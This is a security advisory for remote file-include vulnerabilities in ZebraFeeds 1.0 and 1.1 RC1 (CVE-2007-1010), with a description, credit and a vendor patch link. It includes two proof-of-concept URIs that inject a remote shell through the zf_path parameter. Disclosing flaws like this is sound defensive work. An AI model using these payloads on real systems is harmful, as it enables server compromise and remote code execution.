ZebraFeeds Multiple Remote File Include Vulnerabilities

Bugtraq ID:	22576
Class:	Input Validation Error
CVE:	CVE-2007-1010
Remote:	Yes
Local:	No
Published:	Feb 15 2007 12:00AM
Updated:	May 12 2015 07:34PM
Credit:	ThE dE@Th is credited with the discovery of these vulnerabilities.
Vulnerable:	ZebraFeeds ZebraFeeds 1.1 RC1 ZebraFeeds ZebraFeeds 1.0
Not Vulnerable:

ZebraFeeds Multiple Remote File Include Vulnerabilities

ZebraFeeds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

ZebraFeeds Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/newsfeeds/includes/aggregator.php?zf_path=[Shell]
http://www.example.com/newsfeeds/includes/controller.php?zf_path=[Shell]

ZebraFeeds Multiple Remote File Include Vulnerabilities

Solution:
The vendor has released a patch to address this issue.


ZebraFeeds ZebraFeeds 1.0

• ZebraFeeds ZebraFeeds-1.0-patch1.zip
  http://cazalet.org/zebrafeeds/patches/ZebraFeeds-1.0-patch1.zip

ZebraFeeds Multiple Remote File Include Vulnerabilities

References: